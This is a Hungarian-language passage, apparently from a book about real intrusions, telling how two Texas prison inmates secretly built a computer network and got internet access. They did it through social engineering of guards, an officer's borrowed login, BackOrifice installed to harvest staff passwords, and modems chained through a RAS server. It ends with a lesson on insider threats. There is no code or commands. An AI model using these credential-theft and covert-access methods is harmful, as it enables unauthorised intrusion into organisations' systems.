kérdésben. Benntartozódásom alatt nekem „NO COMPUTER”
minősítésem volt, ami azt jelentette, hogy biztonsági fenyegetésnek
számítana, ha bármilyen számítógépes hozzáférésem lenne. Sőt, ami
azt illeti, még a telefonhoz való hozzáférést is veszélyesnek tartották:
egy ügyész egyszer azt mondta egy szövetségi bírónak, hogy ha
letartóztatásom alatt használhatnám a telefont, abba belefütyülve
utasításokat küldhetnék a légierő egy interkontinentális rakétájának.
Abszurd, de a bírónak nem volt oka, hogy ne higgye el. Teljesen
elszigetelve tartottak nyolc hónapig.
Akkoriban a szövetségi rendszerben a fogva tartottak csak nagyon
szigorú szabályok mellett kaphattak számítógépes hozzáférést.
Egyetlen rab sem használhatott olyan számítógépet, amelyhez modem
csatlakozott, vagy amelyben hálókártya vagy más kommunikációs
eszköz volt. A működési szempontból kritikus számítógépeket és a
bizalmas információkat tartalmazó rendszereket egyértelműen
megjelölték egy „Csak személyzet” felirattal, így azonnal látható volt,
ha egy fogva tartott úgy használ számítógépet, hogy az biztonsági
kockázattal járhat. A jogosulatlan használat megelőzése céljából
szakmailag hozzáértő személyzet ellenőrizte a számítógépes hardvert.

William kulcsot kap a mennyországba


Amikor Williamet a farmról átvitték a Huntsville-i Wynne részlegbe,
irigylésre méltó munkát kapott a konyhán. – Kulcsom volt a
mennyországba, mivel az élelmiszert bármire elcserélhettem.
A konyhában egyetlen számítógép volt, egy ősrégi 286-as, amelynek
elöl volt a hűtőventillátora, de elég jó volt ahhoz, hogy előrehaladjon
számítógépes ismereteinek bővítésében. Meg tudta tenni, hogy a
konyhai feljegyzéseket, jelentéseket és megrendelési nyomtatványokat
gépre vigye, ami többi órányi munkától, nevezetesen számoszlopok
összeadásától és egyéb fáradtságos papírmunkától kímélte meg.
Miután William felfedezte, hogy van egy másik rab is, aki osztja a
számítógépek iránti érdeklődését, Danny segített az
élelmiszerraktárban levő számítógép konfigurációjának feljavításában.
Levette az alkatrészeket a mezőgazdasági kamion polcáról, és a
karbantartási feladatokat ellátó, így a börtön területén szabadon mozgó
barátai segítségét kérte.
Senkinek sem mondtak semmit. Becsempészték nekünk a
számítógépalkatrészeket a konyhába – egyszerűen berakták egy
kocsiba, és begördítették.
Majd egyik Szenteste egy őr, hóna alatt egy dobozzal, besétált a
részlegbe. A dobozban lényegében egy teljes számítógép alkatrészei
voltak, illetve egy hub és egyéb cuccok.
Hogyan vette rá az őrt, hogy ilyen nyilvánvalóan megszegje a
szabályokat? – Csak „megpuhítottam” – egyszerűen beszéltem vele, és
összebarátkoztunk. – William szülei megvásároltak a kért számítógép-
alkatrészeket, és az őr beleegyezett, hogy – mintha azok karácsonyi
ajándékok lennének – behozza neki őket.
Annak érdekében, hogy elegendő munkatere legyen a bővülő
számítógépezéshez, William kisajátított egy kicsiny, az
élelmiszerraktárhoz csatlakozó helyiséget. A szoba nem szellőzött,
azonban biztosra vette, hogy ez nem gond, és így is lett: –
Légkondicionálóra cseréltem élelmiszert, lyukat vágtam a falba, és oda
raktuk be a légkondit, így kaptunk levegőt, és kényelmes körülmények
között dolgozhattunk – magyarázta.
Három PC-t építettünk ott hátul. Vettük az öreg 286-os házakat, és
Pentium alaplapokat tettünk beléjük. A merevlemezek nem illeszkedtek
bele, így vécépapír-gurigákat használtunk merevlemeztartók gyanánt,
ami – bár innovatív megoldás – elég viccesen nézhetett ki.
Miért három számítógépet? Danny benézett alkalmanként, és így
mindkettőnknek volt egy-egy gépe. Ráadásul később egy harmadik
srác „ügyvédi irodát” nyitott – a fogva tartottak azzal bízták meg, hogy
jogi kérdések után kutasson az Interneten, illetve beadványokat és
ahhoz hasonló hivatalos iratokat foglalkozom.
Közben William szaktudása, amivel az élelmiszerraktár
papírmunkáit számítógép segítségével rendszerezte, felkeltette egy, az
élelmiszer-ellátásért felelős százados figyelmét. Újabb megbízással
látta el Williamet: amikor nem volt elfoglalva szokásos feladataival,
számítógépes fájlokat kellett előkészítenie a századosnak az igazgató
felé küldendő jelentéseihez.
Hogy végrehajthassa a bővített feladatkörét, Williamnek
megengedték, hogy a kapitány irodájában dolgozhasson – szívet
melengető engedmény egy fogva tartott számára. Azonban egy idő után
William kezdett morgolódni: az élelmiszerraktárban levő számítógépek
ekkorra tele voltak zenei fájlokkal, játékokkal és videókkal. A százados
irodájában nem lehetett része ilyen jellegű szórakozásban. A jó fajta
amerikai innovatív szellem plusz egy adag egészséges vakmerőség
azonban itt is megoldással kecsegtetett.
A konyhából szerzett élelmiszert hálózati kábelre cseréltem a
karbantartókkal. A karbantartó tiszttel 1000 lábnyi Cat 5 [Ethetmet]
kábelt rendeltettünk. Az őrökkel rakattuk le a kábelt. Azt mondtam
nekik, hogy a századosnak csinálom ezt a munkát, és minden ajtó
megnyílt előttem.
William rövid idő alatt Ethernet-kapcsolatot hozott létre az
élelmiszerraktárban levő három és a százados irodájában levő egy
számítógép között. Amikor a százados nem volt ott, élvezhette a
számítógépes játékokat, zenét hallgathatott és nézhette a videóit.
Mindezzel azonban nagy kockázatot vállalt. Mi lett volna, ha a
százados váratlanul visszatér, és meglátja, ahogy zenét hallgat vagy
játszik a gépen, netán szexvideókat néz? Elbúcsúzhatott volna a
konyhában betöltött kivételezett munkakörétől, a százados irodájában
végzendő kényelmez feladatoktól, illetve a nagy fáradsággal
összeszerelt számítógéprendszertől.
Mind e közben Dannynek is megvolt a maga kihívása. Most a
Mezőgazdasági Irodában dolgozott, számítógépekkel volt körülvéve,
mindenhol telefonaljzatokkal, amelyek a külvilághoz csatlakoztak.
Olyan volt, mint egy kissrác, aki az édességbolt kirakatához nyomja az
orrát, miközben egy fillér sincs a zsebében. Olyan közel a mindenféle
kísértés, és nem lehet élvezni.
Egy nap egy tiszt jelent meg Danny apró irodájában. – Behozta a
gépét, mert nem tudott csatlakozni az Internethez. Nem igazán tudtam,
hogy hogyan működik egy modem, senki nem tanított meg nekem
semmit. De sikerült segítenem neki beállítani. – Miközben
megpróbálták csatlakoztatni a gépet, a tiszt – Danny kérésére –
megadta felhasználói nevét és jelszavát; valószínűleg semmi rosszat
nem látott ebben, hiszen tudta, hogy a fogva tartottak egyetlen online
kapcsolattal rendelkező géphez sem férhetnek hozzá.
Danny felismerte azt, amihez az őr túl ostoba vagy műszakilag
képzetlen volt; e-jegyet adott Dannynek az Internethez. Danny titokban
a szekrények mögött egy telefonvonalat vezetett az irodájába, majd a
számítógépben levő belső modemhez csatlakoztatta. A tiszt
felhasználói nevével és jelszavával, amelyeket gondosan megjegyzett,
célban volt; Internet hozzáférést szerzett.

Biztonságos csatlakozás

Az Internet kapcsolat Danny számára egy teljesen új világot nyitott


meg a monitorján. Azonban akárcsak William, ő is mindig óriási
kockázatot vállalt, amikor csatlakozott a világhálóra.
Képes voltam kitárcsázni, információkat gyűjteni számítógépekről
meg mindenről, és kérdéseket feltenni. A tiszt nevében jelentkeztem be,
de állandóan attól féltem, hogy kiderül Igyekeztem nem túl sokáig
fennmaradni, hogy meg ne bénítsam a vonalakat.
Adta magát egy ravasz kis megoldás. Danny egy „elosztót” szerelt a
faxgépbe menő telefonvonalra. Nem sokkal később arról kezdtek
panaszkodni más börtönökből a mezőgazdasági részlegnek, hogy
állandóan foglalt a faxvonaluk. Danny rájött, hogy egy külön vonalat
kell szereznie, ha nyugalomban és biztonságban kíván a Neten
böngészni. Némi felderítés után meg is lett a megoldás: felfedezett két
olyan telefonos aljzatot, amelyek élők voltak ugyan, de használaton
kívüliek. A személyzetből nyilvánvalóan senki nem emlékezett arra,
hogy ezek léteznek. A modemjéből az egyik telefonaljzathoz kapcsolta
a vezetéket. Ezzel saját külső vonalra tett szert – így újabb probléma
oldódott meg.
Apró szobájának egyik sarkában, egy halom doboz alatt felállított
egy számítógépet szervernek, ami tulajdonképpen elektronikus
tárolóeszközként működött azokhoz a nagyszerű dolgokhoz, amelyeket
letölteni tervezett, így a zenei fájlok, a hackelési útmutatók és minden
más nem a saját gépen lesznek, hátha valaki egyszer utánanéz a
dolgoknak.
Kezdtek alakulni a dolgok, de Danny egy újabb nehézséggel találta
magát szemben; ez alkalommal egy számottevően komolyabbal.
Fogalma sem volt, mi lesz akkor, ha ő és a tiszt egyszerre próbálják
meg a tiszt felhasználói nevét használni. Ha Danny már csatlakozott,
vajon a tiszt hibaüzenetet kap, mondván, hogy nem csatlakozhat, mert
a felhasználói neve már használatban van? Lehet, hogy a férfi nem túl
okos, de ekkor biztosan eszébe fog jutni, hogy megadta Dannynek a
bejelentkezési adatait, és elkezd gondolkodni. Ennél a pontnál Danny
nem tudott megoldást; a probléma folyamatosan nyomasztotta.
Ennek ellenére büszke volt mindarra, amit az adott körülmények
között elért. Hihetetlen mennyiségű munkájába került. – Jó alapot
építettem – szervereket működtettem, letöltöttem a webről mindent,
amit csak tudtam, futtattam a „GetRight”-ot [szoftvert], amely
huszonnégy órán keresztül végezte a letöltést. Játékok, videók,
hackelési információk, infók a hálózatok felépítéséről, a
sebezhetőségekről, arról, hogy hogyan találjunk nyitott portokat.
William megértette, hogy hogyan volt lehetséges az, amit Danny a
mezőgazdasági részlegben beállított. – Tulajdonképpen ő volt a
hálózati rendszergazda, mivel az ott dolgozó szabad fickó [a civil
alkalmazott] egy bohóc volt.
A fogva tartottak olyan munkákat kaptak, amelyeket ennek az
alkalmazottnak kellett volna elvégeznie, de nem tudta, hogy kell; ilyen
volt például a „C+ + és a Visual Basic programozás”, illetve még ahhoz
sem volt elég ügyes, hogy megfelelően karbantartsa a hálózatot.
Egy másik kihívás is aggasztotta Dannyt: számítógépe egy folyosóra
nézett, így mindenki láthatta, hogy éppen mit csinál. Mivel a
Mezőgazdasági Iroda munkaidő után zárva volt, csak napközben tudott
csatlakozni, lesve a pillanatokat, amikor az irodában mindenki más el
volt foglalva saját feladatával, és senkinek nem volt ideje azzal törődni,
hogy Danny éppen miben mesterkedik. Miután megismert egy ügyes
trükköt, amely lehetővé tette, hogy átvegye egy másik számítógép
felett az irányítást, a vele szemben dolgozó civil alkalmazott gépéhez
csatlakoztatta a számítógépét. Amikor a férfi nem volt ott, és úgy tűnt,
hogy a következő percekben senki nem fog a hátsó szobába menni,
Danny utasításokat adott a másik gépnek, csatlakoztatta azt, és
beállította, hogy töltse le a sarokban levő szerverre a kiválasztott
játékot vagy zenét.
Egyik nap, amikor éppen a kellős közepén volt annak, hogy egy
letöltés érdekében csatlakozzon, valaki váratlanul feltűnt Danny
munkaterületén: egy női őr – a nők mindig sokkal keményebbek és
szabálykövetőbbek, mint a férfiak; ebben Danny és William feltétlenül
egyetértett. Mielőtt megszüntethette volna a másik gép feletti irányítást,
az őr szemei elkerekedtek: észrevette a mozgó egérmutatót! Dannynek
sikerült kilépnie a műveletből. Az őr pislogott egyet, valószínűleg azt
gondolta, hogy csak képzelte az egészet, majd kisétált.

A megoldás

William élénken emlékszik a napra, amikor Dannynek eszébe jutott


a megoldás az Internet hozzáféréssel kapcsolatos mindkét
problémájukra. A konyhai személyzetnek megengedték, hogy miután a
tisztek befejezték az étkezést és elmentek, az ételeiket bevigyék a tiszti
étkezdébe. William gyakran becsempészte Dannyt, hogy „sokkal
jobbat” egyen vele az étkezőben, ráadásul ott arra is lehetőségük volt,
hogy titokban beszélgessenek. – Még ma is emlékszem arra a napra –
meséli William. – Azt mondta, „Tudom, hogy tudjuk megcsinálni, B.”,
így hívtak engem – B. vagy Nagy B., és ekkor elmondta, mit fogunk
tenni.
Amit Danny a lelki szemeivel látott, az nem volt más, mint két
puzzledarab összeillesztése; a Mezőgazdasági Irodában számára
elérhető telefonvonal és Williamnek a konyhában levő számítógépei.
Olyan módszert javasolt, amely lehetővé tette mindkettőjüknek, hogy
használják a számítógépeket, és teljes szabadságban és biztonságban
internetezzenek.
Állandóan az élelmiszerraktár hátsó részében ültünk, és játszottunk a
számítógépeken, így azt gondoltam: – Ha itt üldögél hetünk és
játszhatunk, és ez senkit nem érdekel – az őröket sem zavarta, feltéve,
hogy a munkánkat elvégeztük akkor miért nem innen internetezünk?
A Mezőgazdasági Irodának sokkal modernebb számítógépes
felszerelése volt, mert mint Danny elmondta, az állam más börtönei az
ő szerverükhöz szinkronizálták rendszereiket. Ez azt jelenti, hogy a
többi börtönben levő számítógép betárcsázással csatlakozott a
Mezőgazdasági Iroda szerveréhez, amely úgy volt beállítva, hogy a
Microsoft RAS (Remote Access Services) segítségével modemeken
keresztül fogadja a hívásokat.
A fiúk egy fontos problémával szembesültek: minden a modemeken
múlott. – A modemek megszerzése kulcsfontosságú volt – mondta
William. – Eléggé vigyáztak rájuk. Ennek ellenére sikerült néhányra
rátenni a kezünket. – Amikor készen álltak arra, hogy az
élelmiszerraktárból csatlakozzanak, „tulajdonképpen azt tettük, hogy a
belső telefonvonalakon betárcsáztunk a Mezőgazdasági Részlegbe”.
Lefordítva: A fiúk az élelmiszerraktárból olyan parancsot vittek be,
amely arra utasította a számítógép modemjét, hogy tárcsázzon egy
belső telefonvonalon. A hívást egy a farmon levő modem fogadta, ami
Danny szerveréhez volt csatlakoztatva. Az a szerver egy helyi
hálózaton volt, és az irodában levő összes számítógéphez kapcsolódott,
amelyek közül néhánynak külső telefonvonalakhoz csatlakoztatott
modemje volt. Mivel az élelmiszerraktár és a Mezőgazdasági Iroda
számítógépes hálózatai a belső telefonvonalon kommunikáltak
egymással, a következő parancs arra utasította az iroda egyik gépét,
hogy tárcsázzon ki az internetre. Voilá! Azonnali hozzáférés!
Nos, nem egészen. A két hackernek még egy felhasználói névre is
szüksége volt valamely Internet-szolgáltatónál. Kezdetben a részlegben
dolgozó személyzet felhasználói neveit és jelszavait használták,
„amikor biztosak voltunk benne, hogy a városon kívül vannak, például
vadásznak vagy valami ilyesmi”, mondja Danny. Ezeket az
információkat úgy szerezték be, hogy egy „BackOrifice” nevű szoftvert
telepítettek a többi számítógépre; ez egy népszerű távoli figyelő
eszköz, amely vezérlést enged egy távoli számítógéphez, pontosan úgy,
mintha közvetlenül a gép előtt ülne.
Természetesen a mások jelszavainak használata kockázatos volt –
számtalan módon le lehetett bukni. Ez alkalommal William találta meg
a megoldást. – Megkértem a szüleimet, hogy fizessenek elő nekünk
Internet-szolgáltatást az egyik helyi szolgáltatónál így többé nem
kellett mások bejelentkezési adatait használniuk.
Végül a Mezőgazdasági irodán keresztül a nap 24 órájában, a hét 7
napján volt Internet kapcsolatuk. – Két FTP szerverünk volt ott,
amelyek folyamatosan filmeket, zenét, illetve hackelő eszközöket és
ilyen jellegű dolgokat töltöttek le – mondja Danny. – Olyan játékokat
szereztem meg, amelyeket még ki sem adtak.
Majdnem bukta

Az élelmiszerraktárban levő központjukban William hangkártyákat


és külső hangszórókat szerelt fel, hogy zenét hallgathassanak, illetve
hallják a letöltött filmek hangját. Ha egy őr megkérdezte, hogy mit
csinálnak, William azt mondta; – Én nem kérdezek a te dolgaidról, te
se kérdezz az enyémekről.
Mindig azt mondtam [az őröknek], hogy vannak dolgok, amiket meg
tudok ígérni. Először is soha nem lesz pisztolyom, és senkit nem fogok
itt lelőni. Másodszor, nem fogok drogozni és leépíteni az agyamat.
Harmadszor, nem leszek köcsög és nem lesz köcsögöm. Negyedszer,
nem fogok kavarni egy női tiszttel.
Azt nem ígérhettem nekik, hogy nem fogok harcolni. Sosem hazudtam
nekik. És ők becsülték az őszinteségemet és nyíltságomat, ezért
hajlandóak voltak megtenni nekem dolgokat. Az őröket rá lehet
beszélni arra, hogy szívességeket tegyenek.
A beszélgetés irányítja az egész népet. Kibeszéled a nőket a
bugyijukból, tudod, mire gondolok, és rábeszéled a fickókat, hogy
megtegyék, amit szeretnél, hogy megtegyenek neked.
Akármilyen jól beszéljen is egy rab, egyetlen őr sem fogja
megengedni a fogva tartottaknak, hogy szabadon birtokoljanak
számítógépeket és külső telefon-vonalakat. Hogyan lehet, hogy ők
kelten az őrök szeme láttára hackerkedhettek? William ezt így
magyarázta meg:
Azért tudtunk ilyen sok mindent megtenni, mert úgy néztek ránk, mint
a féleszűekre. Minden szempontból ostobaság vett minket körül, így a
főnököknek [az őröknek] elképzelésük sem volt arról, hogy mit is
csinálunk. Fel sem tudták mérni, hogy mire lehetünk képesek.
Egy másik ok lehet, hogy a két fogva tartott olyan számítógépes
munkát végzett, amiért másoknak fizettek. – A legtöbben, akik azért
voltak ott, mert érteniük kellett volna a számítógépes dolgokhoz –
mondja William – semmit sem konyítottak a dologhoz, így fogva
tartottakkal végeztették a munkájukat.
Ez a könyv tele van olyan káosszal és kárral, amit hackerek képesek
okozni, azonban William és Danny nem akartak bűnöket elkövetni.
Egyszerűen el akarták mélyíteni számítógépes ismereteiket, és
szórakozni akartak – amit az adott körülmények között nem nehéz
megérteni. William számára fontos, hogy az emberek megértsék ezt a
különbségtételt.
Soha nem éltünk vissza a helyzettel, illetve senkit sem bántottunk.
Soha. Úgy értem, hogy az én szemszögemből szükségesnek tűnt, hogy
megtanuljam, amit meg akarok tanulni, és sikeres lehessek, ha majd
kiszabadulok.
Miközben a texasi börtönszemélyzet egyáltalán nem tudott arról,
hogy mi folyt ott, annyiban szerencséjük volt, hogy Williamet és
Dannyt pozitív ösztönzök mozgatták. Képzeljük el, milyen felfordulást
okozhattak volna ők ketten; gyerekjáték lett volna a fiúknak olyan
módszer kifejlesztése, amivel pénzt vagy értékeket csalhattak volna ki
gyanútlan áldozatokból. Az Internet lett számukra az egyetem és a
játszótér. Semmibe nem került volna, hogy megtanulják, hogy csapják
be az embereket vagy hogyan törjenek be céges oldalakra; a tizenéves
vagy annál is fiatalabb kölykök bármelyik nap elsajátíthatják ezeket a
hackeroldalakról vagy más honlapokról. És Dannynek és Williamnek
ideje aztán tényleg volt a börtönben.
Talán itt van a tanulság: két elítélt gyilkosról van szó, azonban ez
nem azt jelenti, hogy velejükig romlottak lettek volna. Csalók voltak,
akik illegális módon jutottak Internethez; de ebből nem szükségszerűen
következik, hogy hajlandóak lettek volna ártatlan embereket vagy naiv
módon saját magukat veszélynek kitevő cégeket áldozattá tenni.

Közeli hívás

A két kezdő hacker azonban nem engedte, hogy az Interneten


elérhető szórakozás elterelje figyelmüket a tanulástól. – A családomtól
meg tudtam szerezni az engem érdeklő könyveket – mondja William,
aki csínytevéseit szükséges gyakorlatnak tekintette. – Meg akartam
érteni egy TCP/IP hálózat működési finomságait. Szükségem volt erre
a tudásra a majdani kinti életemhez.
Tanulás volt, és persze szórakozás is – tudod, mire gondolok. Móka
volt, mert A típusú személyiség vagyok – szeretek a határokig elmenni.
És arra is jó volt, hogy megfricskázzuk az őrök orrát. Mert semmit nem
gyanítottak.
Internet használatuk komoly és szórakoztató oldalai mellett Danny
és William a társadalomba való beilleszkedésről is kaptak némi leckét.
Elektronikus barátságot kezdtek hölgyekkel, online csevegő szobákban
vagy e-mailben érintkezve velük. Némelyiküknek elmondták, hogy
börtönben vannak; a legtöbbjüknek azonban nem említették ezt a tényt.
Nem meglepő.
A határok pedzegetése lehet éltető, bizsergető hatású, azonban
mindig nagy kockázattal jár. William és Danny soha nem tudott
leszokni arról, hogy állandóan hátra-hátra nézzenek a válluk felett.
– Egyszer nagyon közel jártunk ahhoz, hogy elkapjanak – emlékszik
vissza William. – Az egyik tisztet nem szerettük, mert igazi paranoiás
volt. Nem szerettünk online lenni, amikor ő dolgozott.
Egyik nap ez az őr hívta az élelmiszerraktárt, és állandóan foglalt
volt a vonal. – Ami igazán dühítette, hogy a konyhában dolgozó egyik
fickó összejött a börtönkórház egyik ápolójával. – Az őr azt gyanította,
hogy a rab, George foglalja el a vonalat azzal, hogy nem engedélyezett
hívást folytat az ápolóval. A vonal valójában azért volt foglalt, mert
William használta az Internetet. Az őr az élelmiszerraktárba sietett. –
Hallottuk a kulcsot az ajtóban, így tudtuk, hogy jön valaki. Mindenből
kiléptünk.
Amikor az őr megérkezett, William éppen jelentéseket vitt be a
számítógépbe, Danny pedig ártatlanul nézett rá. Az őr tudni akarta,
hogy miért volt olyan sokáig foglalt a vonal. William készen állt a
válasszal, és előadott egy történetet, amely szerint a jelentéshez
szükséges adatok miatt kellett telefonálnia.
Innen hátulról nem szerezhettünk külsővonalat, és pontosan tudta
ezt, de ez a fickó egyszerű szuperparanoiás volt. Azt gondolta, hogy
valahogyan George-nak segítettünk felhívni a menyasszonyát.
Hitte vagy nem hitte William történetét, bizonyíték nélkül az őr mit
sem tehetett. George később feleségül vette az ápolót; amennyire
William tudja, még mindig börtönben van, és boldog házasember.

Felnövekedés

Hogyan kerül börtönbe egy olyan fiatal, mint William – jó családból


származó kölyök gondos, szerető szülőkkel? – A gyerekkorom
tökéletes volt. Közepes tanuló voltam, de nagyon okos. Sose fociztam,
és nem játszottam ilyeneket, de semmi baj nem volt velem, amíg
főiskolára nem mentem.
A déli baptista közeg nem adott pozitív élményeket Williamnek. Ma
úgy érzi, hogy a túlzott vallásosság károsíthatja egy fiatal önbecsülését.
– Tudod, azt sulykolják beléd, hogy születésed óta értéktelen vagy. –
Rossz döntéseit részben annak tulajdonítja, hogy az az érzés alakult ki
benne, hogy nem lehet sikeres. – Így aztán, valahonnan meg kellett
szereznem az önérzetemet és önbecsülésemet, és a tőlem félő
emberektől szereztem meg azt.
A filozófiaszakos William rájött, mit értett Friedrich Nietzsche a
„lélek metamorfózisán”:
Nem tudom, olvastál-e valamit is Nietzshétől, de ő beszélt a tevéről,
az oroszlánról és a gyerekről. És én igazán teve voltam – Tetteimben
azt tartottam fontosnak, hogy önbecsülést szerezzek az engem
szeretőemberektől, ahelyett, hogy magamat szerettem volna és a saját
érdemeim szerint éltem volna.
Ennek ellenére William makulátlan eredményekkel jutott túl a
középiskolán. Problémái akkor kezdődtek, amikor Houston környékén
beiratkozott egy főiskolára, majd átment egy louisianai iskolába
repülést tanulni. A mások boldoggá tételére irányuló törekvés tisztelet
iránti vággyá változott.
Láttam, hogy Ecstasy és egyéb anyagok eladásából pénzt tudok
csinálni. Az emberek féltek tőlem, mert mindig fegyver volt nálam, és
mindig kész voltam harcolni, és tudod, úgy éltem, mint egy hülye.
Aztán egyszeresük azt vettem észre, hogy egy kábítószerügylet
rosszul sült el
Ő és ügyfele verekedni kezdett. A másik fickó egy haverja is
előkerült; ketten voltak egy ellen, és William tudta, hogy tennie kell
valami nagyon elszántat, különben nem fogja a verekedést túlélni.
Elővette a fegyverét és tüzelt. És a férfi meghalt.
Hogyan néz szembe a kőkemény valósággal egy erős, stabil
családból származó fiú? Hogyan közli a borzalmas hírt?
Életem egyik legkeményebb dolga volt elmondani anyámnak. Igen,
nagyon nehéz volt.
Williamnek sok ideje volt azon gondolkodni, mi juttatta őt börtönbe.
Csak önmagát hibáztatja. – Tudod, a hibás önbecsülésem miatt hozott
rossz döntéseknek köszönhető az egész. És semmi köze nincs ahhoz,
amit a szüleim tettek, mivel ők úgy neveltek fel engem, ahogy jónak
látták.
Danny számára minden egyetlen éjszaka alatt ment tönkre.
Csak egy ostoba kölyök voltam. A tizennyolcadik születésnapomon
nagy partit csaptak nekem. Hazafele menet néhány lánynak ki kellett
mennie a mosdóba, ezért megálltam egy étteremnél.
Amikor kijöttek, néhány srác követte és zaklatta őket. Kikászálódtunk
a kocsiból, és nagy bunyó kezdődött, és mielőtt mindennek vége lett
volna, elütöttem az egyiküket.
Majd pánikba estem és elhúztunk. Elhagytuk a helyszínt.
A Richard Nixon/Martha Stewart szindróma volt: nem volt hajlandó
előállni és vállalni tettéért a felelősséget. Ha Dan nem hajtott volna el,
a vád valószínűleg gondatlanságból elkövetett emberölés lett volna. A
helyszín elhagyása súlyosbította a hibát; és amikorra kinyomozták és
letartóztatták, már túl késő volt ahhoz, hogy bárki elhiggye, hogy
baleset volt.

Ismét szabadlábon

William már egynegyedénél járt a harmincéves büntetésének, de


még semmilyen sikerrel nem jártak a feltételes szabadlábra bocsátást
engedélyező bizottság előtt évente tett látogatásai. Ismét előtérbe került
kezdeményezőkészsége. Elkezdett leveleket írni a bizottságnak,
kéthetente egy levelet, a másolatokat egyenként a bizottság tagjainak
címezte. A levelekben azt fejtette ki, hogy milyen konstruktív módon
viselkedett a börtönben: – Milyen leckéket vettem, milyen jegyeket
kaptam, milyen informatikai könyveket olvastam és így tovább –
jelezvén a bizottságnak, hogy nem vagyok haszontalan és nem
vesztegetem az időmet.
William elmondta: – Az egyik tag azt mondta anyámnak: „Több
levelet kaptam tőle, mint a hat gyerekemtől együttvéve.” – A dolog
bevált: majdnem egy évig csinálta, és amikor legközelebb megjelent a
bizottság előtt, azok engedélyezték a feltételes szabadlábra helyezést.
Danny, aki rövidebb büntetését töltötte, nagyjából ugyanekkor
szabadult.
Mióta kikerültek a börtönből, William és Danny is határozottan
eltökélte, hogy úgy élnek, hogy minden bajból kimaradjanak, és a
„benti” évek alatt szerzett tudásukkal számítógépekkel kapcsolatos
munkát végeznek. Noha mindketten főiskolai szintű műszaki képzésen
vettek részt a börtönben, úgy gondolják, hogy a saját kezükkel végzett
munkájuk, az így szerzett tapasztalatuk az, amely – bármilyen
veszélyesek volt is – hozzásegítette őket mindazon szaktudáshoz,
amiből most megélnek.
Danny 64 főiskolai kreditet szerzett a börtönben, és noha semmilyen
szakmai képzettséget igazoló papírt nem tudott szerezni, most olyan
komoly alkalmazásokkal dolgozik, mint például az Access és az SAP
A börtön előtt William befejezte a főiskola első évét, éppen
másodéves volt, és szülei támogatták őt. Amikor kikerült, folytatni
tudta a tanulmányait. – Anyagi támogatásért folyamodtam, amit meg is
kaptam, és így iskolába tudtam menni. Csupa ötöst kaptam, és az iskola
számítógépes központjában dolgoztam.
Jelenleg két diplomája van – szabad művészetből és számítógépes
hálózatkarbantartásból mindkettőt a segélyből fizette. A két diploma
ellenére William álláskeresése nem volt olyan szerencsés, mint Dannyé
az ő számítógépes munkájával, így elfogadta, amit talált: egy fizikai
munkát is tartalmazó pozíciót. Azonban eltökéltségének és munkaadója
nyitott hozzáállásának köszönhetően, amint felfigyeltek számítógépes
ismereteire, kivették a fizikai munkakörből, és olyan állást kapott, ahol
jobban hasznát veszik műszaki végzettségének. Rutinszerű, üzleti
számítógépkezelés, nem pedig hálózattervezés, amit igazán szívesen
csinálna, de az ilyen jellegű érdeklődését tökéletesen kielégíti az a
munka, amit hétvégenként önkéntesként két Houston környéki
templomnak végez: olcsó számítógépes hálózatot próbál kialakítani.
A két férfi minden bizonnyal kivétel. A jelenkori amerikai
társadalom egyik legnyomasztóbb és kevés nyilvánosságot kapó
kihívása, hogy a legtöbb börtönből szabadult egykori elítélt
gyakorlatilag képtelen munkát találni, különösen olyan munkát,
amellyel eleget kereshet ahhoz, hogy eltartsa a családját. Ezt könnyű
megérteni: hány munkaadó alkalmaz bizalommal olyan dolgozót, aki
gyilkosságért, fegyveres rablásért vagy nemi erőszakért elítélt bűnöző?
Több államban nem jogosultak jóléti ellátásra, így nagyon kevés
lehetőségük marad saját maguk fenntartására, miközben majdnem
teljesen reménytelenül folytatják az álláskeresést. Választási
lehetőségeik igen korlátozottak – mi pedig csodálkozunk, hogy sokan
közülük olyan gyorsan visszakerülnek a börtönbe, és azt feltételezzük,
hogy minden bizonnyal hiányzik belőlük a szándék, hogy a szabályok
szerint éljenek.
William néhány megfontolandó tanácsot ad a fiataloknak és
szüleiknek:
Nem hiszem, hogy bármi mást mondhatunk egy fiatalnak abból a
célból, hogy megváltozzon, mint hogy az értékek benne vannak, és hogy
soha ne válassza a rövidebb utat, mert a végén úgy is látni fogja, hogy
a hosszabb út mindig kifizetődőbb. És tudod, soha ne ülj tétován arra
gondolva, hogy nem vagy elég értékes ahhoz, amit tenned kell.
Danny kétségkívül egyetért William e szavaival:
Semmire nem cserélném el az életemet. Rájöttem, hogy akkor
találom meg az utam az életben, ha saját érdemeim szerint, az egyenes
úton járva élek. Az évek során megtanultam, hogy az emberek az
érdemeim miatt tisztelnek. Ma e szerint próbálok élni.

BETEKINTÉS

A történet rávilágít arra, hogy sok olyan számítógépes támadás van,


amelyek ellen nem védekezhetünk csupán a külső fal biztosításával.
Van, amikor a gazemberek nem holmi tizenéves hackerek vagy
számítógépes ismeretekkel rendelkező tolvajok, hanem egy bennfentes
– egy elégedetlen alkalmazott, egy kirúgott, megkeseredett korábbi
dolgozó – vagy mint jelen esetben – másfajta belsős, mint William és
Danny.
A bennfentesek nagyon gyakran nagyobb fenyegetést jelentenek,
mint a támadók, akikről az újságban olvashatunk. Miközben a
biztonsági ellenőrzések zöme a külső falak külső támadóval szembeni
védelmére összpontosítanak, a belsősök azok, akik hozzáférnek a
fizikai és elektronikai berendezésekhez, a kábelezéshez, a
telefonszekrényekhez, a munkaállomásokhoz, a hálózati
csatlakozókhoz. Azt is tudják, hogy a szervezet hogy kezeli a bizalmas
információkat, mely számítógépes rendszereken tárolják azokat, illetve
hogy hogyan lehet kikerülni a lopás és csalás lehetőségét csökkentő
célból elhelyezett ellenőrző mechanizmusokat.
A történet egy másik szemszögből A remény rabjai (Shawshank
Redemption) című filmre emlékeztet. Ebben az egyik elítélt, akit
Andynek hívnak, könyvelő. Néhány őr vele készítteti el az
adóbevallását, és ő tanácsokat ad nekik arra vonatkozóan, hogy milyen
pénzügyi műveletekkel csökkenthetik a legjobban a fizetendő adójukat.
Andy tudása hamarosan széles körben ismertté válik a
börtönszemélyzet körében; egyre több, magasabb szintű kőnyelői
munkát kap a börtönben, mígnem végül rájön, hogy az igazgató
meghamisítja a börtön könyvelését. Nem csupán a börtönben, hanem
mindenhol nagyon óvatosnak és diszkrétnek kell lennünk abban, hogy
kivel közlünk bizalmas információkat.
A United States Marshals Service (egy amerikai rendfenntartó szerv,
a rendőrbírók szervezete) igen magas szintű paranoiáról tett
tanúbizonyságot az én népességeimet illetően. Külön figyelmeztetést
helyeztek az aktámba, amely arra szólította fel a börtönalkalmazottakat,
hogy semmilyen személyes információt ne közöljenek velem – még a
